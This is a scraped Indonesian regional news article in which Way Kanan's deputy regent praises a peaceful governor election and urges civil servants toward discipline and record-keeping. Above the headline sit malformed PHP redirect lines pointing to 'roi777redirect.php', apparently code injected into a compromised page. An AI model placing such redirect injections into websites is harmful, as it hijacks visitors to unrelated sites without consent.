header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Wabub Edward Apresiasi Keamanan dan Kelancaran Pelaksanaan Pilgub Di Way Kanan -
Wabub Edward Apresiasi Keamanan dan Kelancaran Pelaksanaan Pilgub Di Way Kanan

TRANSLAMPUNG.COM, BLAMBANGAN UMPU – Wakil Bupati Way Kanan Edward Antony Sangat mengapresiasi atas terselenggaranya Pemilihan Gubernur di Kabupaten Way Kanan yang berjalan dengan aman dan lancar.

Menurut nya Ketertiban dan kenyamanan yang terjaga baik sebelum ataupun sesudah pemilihan merupakan hasil kerjasama masyarakat Way Kanan. Dan semoga hasilnya nanti dapat diterima oleh masyarakat sehingga tidak menimbulkan perpecahan di Kabupaten Way Kanan.

“Pesta demokrasi telah berakhir, saatnya kita kembali pada rutinitas keseharian dan terus mendukung program-program Bupati untuk mewujudkan Way Kanan Maju dan Berdaya Saing 2021,” Ujar nya ketika menjadi pemimpin Upacara mingguan di Lapangan Pemda setempat, Senin (02/07).

Pada kesempatan itu, Wakil Bupati juga meminta kepada seluruh jajaran Aparatur Sipil Negara (ASN) untuk lebih meningkatkan disiplin pada upacara bendera dan apel yang diselenggarakan Pemda Way Kanan, serta dapat bersikap siap dan tegap pada saat baris-berbaris agar terlihat rapi pada saat upacara maupun apel.

“Jika disiplin sudah tertanam maka akan terlihat saat berbaris pada upacara maupun apel. Sikap siap sempurna  dan kehadiran baik dalam upacara maupun apel menunjukkan tingkat disiplin yang dimiliki sehingga kinerja pun dapat ikut meningkat,” Pinta Edward.

Pada upacara bendera yang juga diikuti oleh Sekretaris Daerah Kabupaten, Saipul dan para Staf Ahli Bupati, para Asisten, para Kepala Satuan Kerja Perangkat Daerah serta staf itu, Wakil Bupati juga menekankan kepada seluruh jajaran nya untuk lebih memperhatikan data-data terkait perencanaan dan pencapaian selama kepemimpinan nya bersama Bupati Raden Adipati Surya.

“Kita telah memasuki tahun ketiga kepemimpinan Bupati dan Wakil Bupati, untuk itu segera lengkapi data-data yang valid, dan disetiap SKPD agar dikhususkan satu atau dua orang staf untuk merekap data-data yang pada akhir jabatan Saya dan Pak Bupati nanti dapat dipaparkan pencapaian-pencapaian untuk mewujudkan Way Kanan Maju dan Berdaya Saing 2021,” Pungkas nya. (migo).

News Reporter
Kepala Biro di Waykanan